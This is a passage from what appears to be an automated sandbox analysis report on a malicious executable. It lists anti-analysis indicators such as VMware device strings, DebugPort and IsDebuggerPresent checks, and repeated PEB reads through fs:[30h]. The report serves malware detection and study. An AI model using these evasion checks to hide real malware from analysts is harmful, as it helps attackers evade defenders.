          Source: explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000002.4176050709.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000003.00000002.4168908689.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0040ACE0 LdrLoadDll | 2_2_0040ACE0
          Source: C:\Windows\SysWOW64\cmd.exe | Code function: 4_2_00262E37 IsDebuggerPresent | 4_2_00262E37
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0180C188 mov eax, dword ptr fs:[00000030h] | 2_2_0180C188
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0180C188 mov eax, dword ptr fs:[00000030h] | 2_2_0180C188
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_01756154 mov eax, dword ptr fs:[00000030h] | 2_2_01756154
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_01756154 mov eax, dword ptr fs:[00000030h] | 2_2_01756154
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_0174C156 mov eax, dword ptr fs:[00000030h] | 2_2_0174C156
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017E8158 mov eax, dword ptr fs:[00000030h] | 2_2_017E8158
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h] | 2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h] | 2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017E4144 mov ecx, dword ptr fs:[00000030h] | 2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h] | 2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017E4144 mov eax, dword ptr fs:[00000030h] | 2_2_017E4144
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_018161C3 mov eax, dword ptr fs:[00000030h] | 2_2_018161C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_018161C3 mov eax, dword ptr fs:[00000030h] | 2_2_018161C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_01780124 mov eax, dword ptr fs:[00000030h] | 2_2_01780124
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FA118 mov ecx, dword ptr fs:[00000030h] | 2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FA118 mov eax, dword ptr fs:[00000030h] | 2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FA118 mov eax, dword ptr fs:[00000030h] | 2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FA118 mov eax, dword ptr fs:[00000030h] | 2_2_017FA118
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_018261E5 mov eax, dword ptr fs:[00000030h] | 2_2_018261E5
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov eax, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017FE10E mov ecx, dword ptr fs:[00000030h] | 2_2_017FE10E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017801F8 mov eax, dword ptr fs:[00000030h] | 2_2_017801F8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_01810115 mov eax, dword ptr fs:[00000030h] | 2_2_01810115
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h] | 2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe | Code function: 2_2_017CE1D0 mov ecx, dword ptr fs:[00000030h] | 2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE1D0 mov eax, dword ptr fs:[00000030h]2_2_017CE1D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D019F mov eax, dword ptr fs:[00000030h]2_2_017D019F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A197 mov eax, dword ptr fs:[00000030h]2_2_0174A197
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A197 mov eax, dword ptr fs:[00000030h]2_2_0174A197
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A197 mov eax, dword ptr fs:[00000030h]2_2_0174A197
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824164 mov eax, dword ptr fs:[00000030h]2_2_01824164
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824164 mov eax, dword ptr fs:[00000030h]2_2_01824164
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01790185 mov eax, dword ptr fs:[00000030h]2_2_01790185
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F4180 mov eax, dword ptr fs:[00000030h]2_2_017F4180
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F4180 mov eax, dword ptr fs:[00000030h]2_2_017F4180
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177C073 mov eax, dword ptr fs:[00000030h]2_2_0177C073
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752050 mov eax, dword ptr fs:[00000030h]2_2_01752050
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6050 mov eax, dword ptr fs:[00000030h]2_2_017D6050
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018160B8 mov eax, dword ptr fs:[00000030h]2_2_018160B8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018160B8 mov ecx, dword ptr fs:[00000030h]2_2_018160B8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6030 mov eax, dword ptr fs:[00000030h]2_2_017E6030
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A020 mov eax, dword ptr fs:[00000030h]2_2_0174A020
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C020 mov eax, dword ptr fs:[00000030h]2_2_0174C020
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E016 mov eax, dword ptr fs:[00000030h]2_2_0176E016
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D4000 mov ecx, dword ptr fs:[00000030h]2_2_017D4000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F2000 mov eax, dword ptr fs:[00000030h]2_2_017F2000
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C0F0 mov eax, dword ptr fs:[00000030h]2_2_0174C0F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017920F0 mov ecx, dword ptr fs:[00000030h]2_2_017920F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0174A0E3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017580E9 mov eax, dword ptr fs:[00000030h]2_2_017580E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D60E0 mov eax, dword ptr fs:[00000030h]2_2_017D60E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D20DE mov eax, dword ptr fs:[00000030h]2_2_017D20DE
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017480A0 mov eax, dword ptr fs:[00000030h]2_2_017480A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E80A8 mov eax, dword ptr fs:[00000030h]2_2_017E80A8
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175208A mov eax, dword ptr fs:[00000030h]2_2_0175208A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F437C mov eax, dword ptr fs:[00000030h]2_2_017F437C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov ecx, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D035C mov eax, dword ptr fs:[00000030h]2_2_017D035C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F8350 mov ecx, dword ptr fs:[00000030h]2_2_017F8350
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D2349 mov eax, dword ptr fs:[00000030h]2_2_017D2349
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180C3CD mov eax, dword ptr fs:[00000030h]2_2_0180C3CD
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C310 mov ecx, dword ptr fs:[00000030h]2_2_0174C310
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01770310 mov ecx, dword ptr fs:[00000030h]2_2_01770310
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A30B mov eax, dword ptr fs:[00000030h]2_2_0178A30B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A30B mov eax, dword ptr fs:[00000030h]2_2_0178A30B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A30B mov eax, dword ptr fs:[00000030h]2_2_0178A30B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F0 mov eax, dword ptr fs:[00000030h]2_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F0 mov eax, dword ptr fs:[00000030h]2_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E3F0 mov eax, dword ptr fs:[00000030h]2_2_0176E3F0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017863FF mov eax, dword ptr fs:[00000030h]2_2_017863FF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017603E9 mov eax, dword ptr fs:[00000030h]2_2_017603E9
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov eax, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov eax, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov ecx, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017FE3DB mov eax, dword ptr fs:[00000030h]2_2_017FE3DB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F43D4 mov eax, dword ptr fs:[00000030h]2_2_017F43D4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F43D4 mov eax, dword ptr fs:[00000030h]2_2_017F43D4
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A3C0 mov eax, dword ptr fs:[00000030h]2_2_0175A3C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D63C0 mov eax, dword ptr fs:[00000030h]2_2_017D63C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0182634F mov eax, dword ptr fs:[00000030h]2_2_0182634F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181A352 mov eax, dword ptr fs:[00000030h]2_2_0181A352
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748397 mov eax, dword ptr fs:[00000030h]2_2_01748397
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748397 mov eax, dword ptr fs:[00000030h]2_2_01748397
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748397 mov eax, dword ptr fs:[00000030h]2_2_01748397
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177438F mov eax, dword ptr fs:[00000030h]2_2_0177438F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177438F mov eax, dword ptr fs:[00000030h]2_2_0177438F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E388 mov eax, dword ptr fs:[00000030h]2_2_0174E388
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E388 mov eax, dword ptr fs:[00000030h]2_2_0174E388
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E388 mov eax, dword ptr fs:[00000030h]2_2_0174E388
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754260 mov eax, dword ptr fs:[00000030h]2_2_01754260
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754260 mov eax, dword ptr fs:[00000030h]2_2_01754260
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754260 mov eax, dword ptr fs:[00000030h]2_2_01754260
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174826B mov eax, dword ptr fs:[00000030h]2_2_0174826B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A250 mov eax, dword ptr fs:[00000030h]2_2_0174A250
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756259 mov eax, dword ptr fs:[00000030h]2_2_01756259
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D8243 mov eax, dword ptr fs:[00000030h]2_2_017D8243
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D8243 mov ecx, dword ptr fs:[00000030h]2_2_017D8243
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174823B mov eax, dword ptr fs:[00000030h]2_2_0174823B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018262D6 mov eax, dword ptr fs:[00000030h]2_2_018262D6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602E1 mov eax, dword ptr fs:[00000030h]2_2_017602E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602E1 mov eax, dword ptr fs:[00000030h]2_2_017602E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602E1 mov eax, dword ptr fs:[00000030h]2_2_017602E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A250 mov eax, dword ptr fs:[00000030h]2_2_0180A250
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A250 mov eax, dword ptr fs:[00000030h]2_2_0180A250
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602A0 mov eax, dword ptr fs:[00000030h]2_2_017602A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602A0 mov eax, dword ptr fs:[00000030h]2_2_017602A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov ecx, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0182625D mov eax, dword ptr fs:[00000030h]2_2_0182625D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E284 mov eax, dword ptr fs:[00000030h]2_2_0178E284
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E284 mov eax, dword ptr fs:[00000030h]2_2_0178E284
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0283 mov eax, dword ptr fs:[00000030h]2_2_017D0283
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0283 mov eax, dword ptr fs:[00000030h]2_2_017D0283
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0283 mov eax, dword ptr fs:[00000030h]2_2_017D0283
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178656A mov eax, dword ptr fs:[00000030h]2_2_0178656A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178656A mov eax, dword ptr fs:[00000030h]2_2_0178656A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178656A mov eax, dword ptr fs:[00000030h]2_2_0178656A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758550 mov eax, dword ptr fs:[00000030h]2_2_01758550
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758550 mov eax, dword ptr fs:[00000030h]2_2_01758550
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
